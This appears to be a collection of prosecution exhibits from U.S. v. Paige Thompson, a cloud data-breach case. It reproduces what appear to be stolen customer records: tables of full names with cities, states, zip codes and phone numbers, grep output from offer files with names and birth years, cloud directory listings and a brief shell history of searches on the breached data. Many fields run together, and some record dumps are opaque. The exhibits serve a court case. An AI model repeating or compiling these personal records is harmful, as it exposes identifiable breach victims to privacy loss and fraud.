| 17 | | In-Home | C04/14/201404/16/2014Morning   Completed | | 04/16/2014STEVEN | HURLEY | VALRICO |
| 18 | | In-Home | C04/14/201404/15/2014Morning   Completed | | 04/25/2014LAKANA | HAWKINS | MORRILTON |
| 19 | | In-Home | C04/15/201404/14/2014Afternoon Completed | | 04/16/2014MARGARET | MURPHY | WILLIAMSBURG |
| 20 | PRQ404006 | In-Home | C04/10/201404/16/2014Morning   Completed | | 04/21/2014MARY | GUEST | KETCHUM |
| 21 | | In-Home | C04/04/201404/18/2014Morning   Completed | | 04/17/2014LEAH | STRAUB | YUMA |
| 22 | | In-Home | C04/12/201404/16/2014All Day   Completed | | 04/16/2014BOBBY | ALLISON | DANIELS |
| 23 | | In-Home | C04/09/201404/17/2014Morning   Completed | | 04/17/2014SHANNON | SCHWALL | HADLEY |
| 24 | | In-Home | C04/14/201404/18/2014Morning   Completed | | 04/15/2014DUSTIN | BLADES | SULPHUR SPRINGS |
| 25 | | In-Home | C04/09/201404/16/2014Morning   Completed | | 04/14/2014PETER | CUTLER | CANDLER |
| 26 | PRQ478976 | In-Home | C03/04/201404/15/2014All Day   Completed | | 04/15/2014RAMONA | MEDRANO | WESLACO |
| 27 | | In-Home | C04/08/201404/18/2014Afternoon Completed | | 04/18/2014DIANA | GOMEZ | KINGSBURG |
| 28 | | In-Home | C03/21/201404/12/2014Morning   Completed | In Home - Repair Com04/12/2014LISA | MONTOYA | COPIAGUE |
| 29 | | In-Home | C04/16/201404/18/2014Afternoon Completed | | 04/18/2014KRISTIN | LIND | RICHMOND |
| 30 | | In-Home | C04/14/201404/18/2014Afternoon Completed | | 04/22/2014JERRY | BENAVIDES | GREGORY |
| 31 | | In-Home | C04/14/201404/15/2014All Day   Completed | In Home - Repair Com04/15/2014ANDRIA | VOLKMANN | JEWELL |
| 32 | | In-Home | C04/14/201404/17/2014Afternoon Completed | | 04/17/2014KEITH | PISTOCCO | FORT WORTH |
| 33 | | In-Home | C04/15/201404/16/2014Afternoon Completed | | 04/16/2014ROGER | MURO | DIAMOND BAR |
| 34 | | In-Home | C04/14/201404/15/2014All Day   Completed | | 04/15/2014GURKIRPAL | SEHGAL | WOODSIDE |
| 35 | | In-Home | C04/14/201404/16/2014All Day   Completed | | 04/16/2014FRANCES | MENDOZA | PHOENIX |
| 36 | | In-Home | C04/15/201404/16/2014Afternoon Completed | | 04/22/2014THERESA | RINKER | RICHMOND |
| 37 | | In-Home | C04/14/201404/17/2014Morning   Completed | | 04/17/2014DANIELLE | SMITH | PORT SAINT LUCIE |
| 38 | | In-Home | C04/17/201404/18/2014All Day   Completed | In Home - Repair Com04/18/2014ESTER | METZGER | TABERG |
| 39 | | In-Home | C04/17/201404/18/2014Morning   Completed | | 04/18/2014ANTOINETTE | SCHMITZ | RIVERTON |
| 40 | | In-Home | C04/10/201404/14/2014Morning   Completed | | 04/15/2014ROBERT | BICKMEIER | GALLOWAY |
| 41 | | In-Home | C04/16/201404/17/2014Afternoon Completed | | 04/17/2014ANDREA | RULE | SPRINGFIELD |
| 42 | | In-Home | C04/11/201404/14/2014Afternoon Completed | | 04/22/2014RUSSELL | HEATH | KEITHVILLE |
| 43 | | In-Home | C04/05/201404/18/2014Afternoon Completed | | 04/18/2014JOHN | SUTTON | LINCOLN |

| | | | |
|---|---|---|---|
| 1 | Alabama | 356614782 2565066457No | 013 |
| 2 | Oklahoma | 748455505 5802759856No | 013 |
| 3 | Missouri | 633482634 3144866546No | 013 |
| 4 | Alabama | 360832305 3347032119No | 013 |
| 5 | Virginia | 226632661 5712252353No | 013 |
| 6 | Tennessee | 370814621 9314365788No | 013 |
| 7 | Texas | 750873179 2149082705No | 013 |
| 8 | Missouri | 63028    3144404304No | 013 |
| 9 | Florida | 32828    4077612974No | 013 |
| 10 | Pennsylvania | 175439552 7176265931No | 013 |
| 11 | Arizona | 853756508 5035728030No | 013 |
| 12 | Virginia | 231137212 8048337841No | 013 |
| 13 | Virginia | 236662152 7573444234No | 013 |
| 14 | California | 923454264 7609486923No | 013 |
| 15 | Louisiana | 703731117 9856937567No | 013 |
| 16 | Oklahoma | 740363432 9187607025No | 013 |
| 17 | Florida | 335946861 5184236952No | 013 |
| 18 | Arkansas | 721102607 5019084505No | 013 |
| 19 | Virginia | 231853523 7572537905No | 013 |
| 20 | Oklahoma | 74349    9187822188No | 013 |
| 21 | Arizona | 853649750 9287831379No | 013 |
| 22 | West Virginia | 258329584 3047632525No | 013 |
| 23 | Massachusetts | 01035    6624029756No | 013 |
| 24 | Texas | 754824406 8063190930No | 013 |
| 25 | North Carolina | 287159643 8282154768No | 013 |
| 26 | Texas | 785992127 9564913634No | 013 |
| 27 | California | 93631    5593483674No | 013 |
| 28 | New York | 117265027 6316081118No | 013 |
| 29 | Virginia | 232286412 8042084052No | 013 |
| 30 | Texas | 78359    3612229370No | 013 |
| 31 | Iowa | 501307596 5158276101No | 013 |
| 32 | Texas | 761023608 9402286378No | 013 |
| 33 | California | 917893315 9055948585No | 013 |
| 34 | California | 940621113 6507800200No | 013 |
| 35 | Arizona | 850412204 6022768054No | 013 |
| 36 | Michigan | 490626617 5867275609No | 013 |
| 37 | Florida | 349527252 7723596855No | 013 |
| 38 | New York | 13471    3153368249No | 013 |
| 39 | Illinois | 625618221 2176298279No | 013 |
| 40 | Ohio | 431199265 6149497182No | 013 |
| 41 | Missouri | 658025838 4178621750No | 013 |
| 42 | Louisiana | 710476196 3182186741No | 013 |
| 43 | Nebraska | 68502    4024213132No | 013 |

741-009

741-010

| | | | | | | | | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | 315 | 2 | 377 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 71 | 10 0 0 1 1129268 | | 0 1 2 | 2GAL | 0 0 0 0 0 | 100 | COMPLETED | 0sprb0506201405060634 |
| 2 | 94 | 3 | 374 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 73 | 10 0 1 1 1129397 | | 0 28 3 | 3OOK | 0 0 0 0 0 | 200 | COMPLETED | 0sprb0506201405060634 |
| 3 | 59 | 4 | 372 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 81 | 10 0 1 2 1 | | 0 16 4 | 4OMO | 0 0 0 0 0 | 300 | COMPLETED | 0sprb0506201405060634 |
| 4 | 1822 | 2 | 377 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 70 | 10 0 0 1 1129274 | | 0 1 2 | 2OAL | 0 0 0 0 0 | 400 | COMPLETED | 0sprb0506201405060634 |
| 5 | 262 | 2 | 367 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 70 | 10 0 0 1 1129267 | | 0 1 2 | 2OVA | 0 0 0 0 0 | 500 | COMPLETED | 0sprb0506201405060634 |
| 6 | 47 | 1 | 370 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0 | | 0 16 1 | 1OTN | 0 0 0 0 | 600 | COMPLETED | 0sprb0506201405060634 |
| 7 | 68 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 82 | 10 0 1 2 1 | 2149082705 | 0 0 4 | 4OTX | 2 0 0 0 | 700 | HID_TZ06B8 | 0sprb0506201405060634 |
| 8 | 272 | 1 | 370 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129046 | | 0 1 1 | 1OMO | 0 0 0 0 | 800 | COMPLETED | 0sprb0506201405060634 |
| 9 | 48 | 2 | 313 | -1 | 317 | 313rp2014b | 0 490062 | 0 | 0 | 77 | 10 0 0 1 1 | 4077612974 | 0 0 2 | 2OFL | 1 0 0 0 | 900 | HID_MANANA | 0sprb0506201405060634 |
| 10 | 315 | 3 | 364 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 73 | 10 0 1 1 1129368 | | 0 1 3 | 3GPA | 0 0 0 0 | 1000 | COMPLETED | 0sprb0506201405060634 |
| 11 | 130 | 4 | 391 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 76 | 10 0 1 2 1129355 | | 0 26 4 | 4OOR | 0 0 0 0 | 1100 | COMPLETED | 0sprb0506201405060634 |
| 12 | 30 | 4 | 361 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 81 | 10 0 1 2 1 | 8048337841 | 0 0 4 | 4OVA | 1 0 0 0 | 1200 | HID_TZ05B8 | 0sprb0506201405060634 |
| 13 | 494 | 2 | 226 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 67 | 10 0 0 2 0129064 | 7573444234 | 0 1 2 | 2OVA | 1 0 0 0 | 1300 | COMPLETED | 0sprb0506201405060634 |
| 14 | 0 | 4 | 391 | 8 | 317 | 390rp2014b | 0 490062 | 0 | | 80 | 10 0 1 2 1 | | 0 0 4 | 4OCA | 0 0 0 0 | 1400 | HID_TZ08B8 | 0sprb0506201405060634 |
| 15 | 1674 | 5 | 371 | -1 | 314 | 0rp2014b | 0 490062ehgh4emg | 0 | 0 | 82 | 10 0 1 3 1129357 | 9856937567 | 0 1 5 | 5OLA | 1 0 0 0 | 1500 | COMPLETED | 0sprb0506201405060634 |
| 16 | 0 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OOK | 0 0 0 0 | 1600 | HID_TZ06B8 | 0sprb0506201405060634 |
| 17 | 0 | 4 | 362 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4ONY | 0 0 0 0 | 1700 | HID_TZ05B8 | 0sprb0506201405060634 |
| 18 | 450 | 3 | 374 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 73 | 10 0 1 1 1129405 | | 0 1 3 | 3GAR | 0 0 0 0 | 1800 | COMPLETED | 0sprb0506201405060634 |
| 19 | 363 | 1 | 360 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129002 | | 0 1 1 | 1OVA | 0 0 0 0 | 1900 | COMPLETED | 0sprb0506201405060634 |
| 20 | 0 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OOK | 0 0 0 0 | 2000 | HID_TZ06B8 | 0sprb0506201405060634 |
| 21 | 68 | 4 | 392 | 8 | 317 | 398rp2014b | 0 490062 | 0 | 0 | 78 | 10 0 1 2 1 | 9287831379 | 1 0 4 | 4OAZ | 1 0 0 0 | 2100 | HID_TZ08B8 | 0sprb0506201405060634 |
| 22 | 250 | 1 | 360 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129001 | | 0 1 1 | 1OWV | 0 0 0 0 | 2200 | COMPLETED | 0sprb0506201405060634 |
| 23 | 272 | 2 | 377 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 70 | 10 0 0 1 1129269 | | 0 1 2 | 2OMS | 0 0 0 0 | 2300 | COMPLETED | 0sprb0506201405060634 |
| 24 | 0 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OTX | 0 0 0 0 | 2400 | HID_TZ06B8 | 0sprb0506201405060634 |
| 25 | 36 | 2 | 367 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 70 | 10 0 0 1 1 | | 0 16 2 | 2ONC | 0 0 0 0 | 2500 | COMPLETED | 0sprb0506201405060634 |
| 26 | 37 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 81 | 10 0 1 2 1 | 9564913634 | 0 0 4 | 4OTX | 1 0 0 0 | 2600 | HID_TZ06B8 | 0sprb0506201405060634 |
| 27 | 0 | 4 | 391 | 8 | 317 | 398rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OCA | 0 0 0 0 | 2700 | HID_TZ08B8 | 0sprb0506201405060634 |
| 28 | 79 | 2 | 367 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 71 | 10 0 0 1 1 | | 0 16 2 | 2ONY | 0 0 0 0 | 2800 | COMPLETED | 0sprb0506201405060634 |
| 29 | 6 | 4 | 362 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 81 | 10 0 1 2 1 | | 0 0 4 | 4OVA | 0 0 0 0 | 2900 | HID_TZ05B8 | 0sprb0506201405060634 |
| 30 | 451 | 1 | 370 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129049 | | 0 1 1 | 1OTX | 0 0 0 0 | 3000 | COMPLETED | 0sprb0506201405060634 |
| 31 | 0 | 4 | 372 | 8 | 317 | 378rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OIA | 0 0 0 0 | 3100 | HID_TZ06B8 | 0sprb0506201405060634 |
| 32 | 411 | 4 | 372 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1129497 | | 0 1 4 | 4OTX | 0 0 0 0 | 3200 | COMPLETED | 0sprb0506201405060634 |
| 33 | 256 | 3 | 395 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 73 | 10 0 0 2 1125266 | | 0 1 3 | 3OCA | 0 0 0 0 | 3300 | COMPLETED | 0sprb0506201405060634 |
| 34 | 189 | 2 | 397 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 69 | 10 0 0 2 0129201 | | 0 2 2 | 2OCA | 0 0 0 0 | 3400 | COMPLETED | 0sprb0506201405060634 |
| 35 | 159 | 1 | 390 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129106 | | 1 23 1 | 1OAZ | 0 0 0 0 | 3500 | COMPLETED | 0sprb0506201405060634 |
| 36 | 26 | 4 | 362 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 81 | 10 0 1 2 1 | | 0 0 4 | 4OMI | 0 0 0 0 | 3600 | HID_TZ05B8 | 0sprb0506201405060634 |
| 37 | 0 | 4 | 362 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OFL | 0 0 0 0 | 3700 | HID_TZ05B8 | 0sprb0506201405060634 |
| 38 | 550 | 1 | 360 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129004 | | 0 1 1 | 1ONY | 0 0 0 0 | 3800 | COMPLETED | 0sprb0506201405060634 |
| 39 | 187 | 1 | 370 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129047 | | 0 1 1 | 1OIL | 0 0 0 0 | 3900 | COMPLETED | 0sprb0506201405060634 |
| 40 | 0 | 4 | 362 | 8 | 317 | 368rp2014b | 0 490062 | 0 | 0 | 80 | 10 0 1 2 1 | | 0 0 4 | 4OOH | 0 0 0 0 | 4000 | HID_TZ05B8 | 0sprb0506201405060634 |
| 41 | 275 | 1 | 370 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 63 | 10 0 0 1 0129048 | | 0 1 1 | 1OMO | 0 0 0 0 | 4100 | COMPLETED | 0sprb0506201405060634 |
| 42 | 837 | 2 | 377 | -1 | 314 | 0rp2014b | 0 490062 | 0 | 0 | 70 | 10 0 0 1 1129272 | | 0 1 2 | 2OLA | 0 0 0 0 | 4200 | COMPLETED | 0sprb0506201405060634 |
| 43 | | | | | | | | | | | | | | | | | | |

```
1    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
2    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
3    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
4    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
5    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
6    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
7    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
8    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
9    0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121201405300939515150
10   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
11   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
12   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
13   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
14   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
15   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121        Q9
16   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
17   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
18   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
19   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
20   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
21   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
22   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
23   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
24   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
25   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
26   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
27   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
28   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
29   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
30   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
31   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
32   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
33   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
34   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
35   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
36   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
37   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
38   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
39   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
40   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
41   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
42   0 10 0  0  0 0rp2014b    2014080905466221    2121212121212121
43
```

741-012

741-013

```
002001I178201405100939366130003103        001110I152201405061519012126000052
003028I198201405121144151132000941        001851SV01201405061514282126000002
004016I126201405131545562133000472        001851SV01201405061514442126000002
002001I049201405100932386130018223        001107SV01201405061514482126000002
002001I219201405100936586130002623        001851SV01201405061400072126000002
00101SI152201405061519592126000472        001016I152201405061519592126000472
004851SV01201405131548482133000002        001105I157201405061520172126000392
001001I202201405061520192126002722        001001I202201405061520192126002722
002104I181201405100938406130000483        001107SV01201405061400072126000002
003001I202201405121009551132003151        001107SV01201405061400192126000002
004026I014201405120902331132001301        001851SV01201405061480309212600002
004107SV01201405120900521132000001        001104I202201405061402072126000302
002001I152201405061552132126004662        001104I127201405061402592126000282
004107SV01201405120902121132000001        001107SV01201405061807052126000002
00500II014201405120907151132004481        001104I198201405061520292126008972
004851SV01201405131541202133000002        001107SV01201405061518242126000002
004107SV01201405121555501132000002        001107SV01201405061401392126000002
003001I181201405121144331132004501        001856SV01201405061518242126000002
001001I202201405061403102126003632        001001I202201405061403102126003632
004851SV01201405131541242133000002        001851SV01201405061518322126000002
004851SV01201405131723442133000002        001104I202201405061811022126000682
001001I127201405061403592126002502        001001I127201405061403592126002502
002001I181201405100941016130002723        001107SV01201405061519122126000002
004107SV01201405131541402133000002        001107SV01201405061519402126000002
00201EI219201405100943296130000363        001107SV01201405061402472126000002
004107SV01201405131542281233000002        001105I157201405061521382126000372
004107SV01201405120902441132000001        001182SV01201405061810092126000002
00201EI178201405100956006130000403        001110I127201405061408452126000392
004851SV01201405121601061132000002        001110I152201405061408452126000062
00100II152201405061521442126004512        001001I152201405061521442126004512
004107SV01201405131541562133000002        001107SV01201405061520082126000002
00400II156201405131543182133004112        001107SV01201405061520082126000002
003001I181201405100930356130002563        001107SV01201405061810382126000002
002002I126201405081959354128001662        001101I202201405061813182126000232
001023I202201405061814082126001592        001023I202201405061814082126001592
004107SV01201405121556101132000002        001851SV01201405061409392126000002
004851SV01201405121565811132000002        001107SV01201405061406392126000002
00100II148201405061409372126005502        001001I148201405061409372126005502
001001I127201405061522821226001872        001001I127201405061522822126001872
004851SV01201405121557301132000002        001107SV01201405061407312126000002
00100II157201405061522392126002752        001001I157201405061522392126002752
002001I181201405100948336130008373        001856SV01201405061520162126000002
```

```
002001I1782014051009393641300003103
002851SV012014051009282061300000003          003020I1982014051211441511320009-1
002107SV012014051009929561300000003          003110I1832014051211442011320001-1
002001I0492014051009323861300018223
002001I2192014051009365861300002623

002851SV012014051009474861300000003          003105I0882014051211451411320002-1

002104I1812014051009384041300000483
002856SV012014051009375261300000003          003001I2022014051210095511320031-1
002851SV012014050081956124128000002          0031075V012014051009252861300000003
002107SV012014050617000121260000-2           0031075V012014051009221661300000003
002001I1522014050615521321260046-2
002107SV012014050081956404128000002          0031075V012014051009261261300000003
002104I1562014050715341512700292-2           003101I1562014050815413741280003-2
002107SV012014051009345661300000003          0031075V012014051139561132000001
002107SV012014051009381661300000003          0031075V012014051210051711320000-1
002856SV012014051009352061300000003          003001I1812014051211443311320045-1

002851SV012014051009355661300000003          003851SV012014051211404811320000-1
002107SV012014051010002441300000003          0038515V012014051102105113200000-1

002001I1812014051009410141300002723
002107SV012014051009385661300000003          0031075V012014051211412011320000-1
00201-I2192014051009432961300003-3
002107SV012014051010052061300000003          0031075V012014051211434811320000-1
002107SV012014050081957121280000-2           0031075V012014051009274061300000003
00201-I1782014051009560061300004-3
002851SV012014051009481661300000003          003107SV012014051210132111320000-1

002107SV012014051009345661300000003          0031075V012014051211414811320000-1
002107SV012014051009935861300000003          0031075V012014051211436411320000-1
002107SV012014050081957444128000002          003001I1812014051009300356130002563
002002I1262014050819593541280016-2

002101I2192014051009443261300002-3           003851SV012014051200733113200000-1
002107SV012014051009413261300000003          0038515V012014051200937113200000-1


002851SV012014051009420861300000003          0031075V012014051200945113200000-1

002001I1812014051009483361300008373
```

004016I126201405131545562133000472

004851SV01201405131548482133000002

004026I014201405120902331132001301
004107SV01201405120900521132000001

004107SV01201405120902121132000001
004107SV01201405100922206130000003
004851SV01201405131541202133000002
004107SV01201405121555501132000002

004851SV01201405131541242133000002
004851SV01201405131723442133000003

004107SV01201405131541402133000002

004107SV01201405131542282133000002
004107SV01201405120902441132000001

004851SV01201405121601061132000002

004107SV01201405131541562133000002
004001I156201405131543182133004112

004107SV01201405121556101132000002
004851SV01201405121556581132000002

004851SV01201405121557301132000002

005001I014201405120907181132004481

```
s3_logrotate_role
├── [      4096 Mar  5  2019]  accesslog.btglss.net
├── [      4096 Mar  5  2019]  bg-java
├── [      4096 Mar  5  2019]  bg-sharedfs-prod
└── [      4096 Mar  5  2019]  prod-ops.bgcorp.com

4 directories, 0 files
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 750
Admitted_____



```
vodaphone/
├── [       4096 Apr  4  2019]  binaries
│   ├── [       4096 Apr  4  2019]  blacklist
│   ├── [       4096 Apr  4  2019]  cemgm
│   ├── [       4096 Apr  4  2019]  cne
│   ├── [       4096 Apr  4  2019]  ctob
│   ├── [       4096 Apr  5  2019]  ctob_selfcare
│   ├── [       4096 Apr  4  2019]  erbps
│   ├── [       4096 Apr  4  2019]  ercc
│   ├── [       4096 Apr  4  2019]  ercore
│   ├── [       4096 Apr  4  2019]  erif
│   ├── [       4096 Apr  4  2019]  erjboss
│   ├── [       4096 Apr  4  2019]  erpt
│   ├── [       4096 Apr  4  2019]  papa
│   ├── [       4096 Apr  4  2019]  papa_selfcare
│   ├── [       4096 Apr  5  2019]  papaplay
│   └── [       4096 Apr  5  2019]  ppe
├── [       4096 Apr  5  2019]  certs
│   ├── [       4096 Apr  5  2019]  cne
│   ├── [       4096 Apr  5  2019]  common_er
│   ├── [       4096 Apr  5  2019]  ctob
│   ├── [       4096 Apr  5  2019]  ercc
│   ├── [       4096 Apr  5  2019]  papa
│   ├── [       4096 Apr  5  2019]  papa_selfcare
│   └── [       4096 Apr  5  2019]  ppe
└── [       4096 Apr  5  2019]  config
    ├── [       4096 Apr  5  2019]  cemgm
    ├── [       4096 Apr  5  2019]  cne
    ├── [       4096 Apr  5  2019]  ctob
    ├── [       4096 Apr  5  2019]  erbatch
    ├── [       4096 Apr  5  2019]  erbps
    ├── [       4096 Apr  5  2019]  ercc
    ├── [       4096 Apr  5  2019]  ercore
    ├── [       4096 Apr  5  2019]  ergif
    ├── [       4096 Apr  5  2019]  erif
    ├── [       4096 Apr  5  2019]  erpt
    ├── [       4096 Apr  5  2019]  papa
    ├── [       4096 Apr  5  2019]  papa_selfcare
    ├── [       4096 Apr  5  2019]  ppe
    ├── [       4096 Apr  5  2019]  tmp_er_stacks
    └── [       4096 Apr  5  2019]  transit

40 directories, 0 files
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 760
Admitted_____

```
4931   grep -ri seattle ~/aws_scan/capitol_one_inclusion_list
4932   grep -ri seattle . > ~/aws_scan/capitol_one_inclusion_list
4933   less ~/aws_scan/capitol_one_inclusion_list
4934   nano ~/aws_scan/id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 780
Admitted_____



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 781
Admitted_____

./analytics/unloads/20180123-040036/customer_offer/data.csv:96490[5883]1979-05-18[001PCA[2018-02-06[00]\N[LOADOFFER[2018-01-22 12:04:11.17]ACXPRESCRN[2018-01-22 16:03:06.715837][79]PRE_SCREEN_FAILED[STR-001PCA]\N[\N]4
./analytics/unloads/20180123-040036/customer_offer/data.csv:102026[6116]1967-11-04[001TM2[2018-02-06[00]\N[LOADOFFER[2018-01-22 12:04:23.589]ACXPRESCRN[2018-01-22 16:03:06.715837][79]PRE_SCREEN_FAILED[STR-001TM2]\N[\N]
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0011V2","dateOfBirth":"1995-    "lastFourSSN":    ","firstName":"Fredrick","middleName":"W","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0012NT","dateOfBirth":"1972-    "lastFourSSN":    ","firstName":"Jeffrey","middleName":"S","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"00139N","dateOfBirth":"1993-    "lastFourSSN":    ","firstName":"Kayla","middleName":"","lastName":"H
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0014JB","dateOfBirth":"1994-    "lastFourSSN":    ","firstName":"London","middleName":"C","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0017E5","dateOfBirth":"1941-    "lastFourSSN":    ","firstName":"Albertine","middleName":"","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0017OX","dateOfBirth":"1985-    "lastFourSSN":    ","firstName":"Corina","middleName":"","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0018CH","dateOfBirth":"1978-    "lastFourSSN":    ","firstName":"Florence","middleName":"V","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"00180L","dateOfBirth":"1996-    "lastFourSSN":    ","firstName":"Bowen","middleName":"","lastName":"S
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"0019PG","dateOfBirth":"1992-    "lastFourSSN":    ","firstName":"Tanisha","middleName":"G","lastName"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"001D00","dateOfBirth":"1984-    "lastFourSSN":    ","firstName":"Jason","middleName":"S","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"001DAA","dateOfBirth":"1989-    "lastFourSSN":    ","firstName":"Benjamin","middleName":"S","lastName
./preaprvd-eml-offers-processed/TS-inclusion-list/20171212084601_STR_005_ts-inclusion.json:{"offerId":"001DG3","dateOfBirth":"1991-    "lastFourSSN":    ","firstName":"Joseph","middleName":"A","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000MFD","dateOfBirth":"1991-    "lastFourSSN":    ","firstName":"Semere","middleName":"","lastName":"
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000OUM","dateOfBirth":"1988-    "lastFourSSN":    ","firstName":"Anna","middleName":"M","lastName":"S
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000P16","dateOfBirth":"1988-    "lastFourSSN":    ","firstName":"Meghan","middleName":"S","lastName":
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000PEL","dateOfBirth":"1981-    "lastFourSSN":    ","firstName":"Kris","middleName":"","lastName":"On
./preaprvd-eml-offers-processed/TS-inclusion-list/20171207100851_STR_004_ts-inclusion.json:{"offerId":"000PHS","dateOfBirth":"1993-    "lastFourSSN":    ","firstName":"Serena","middleName":"M","lastName":
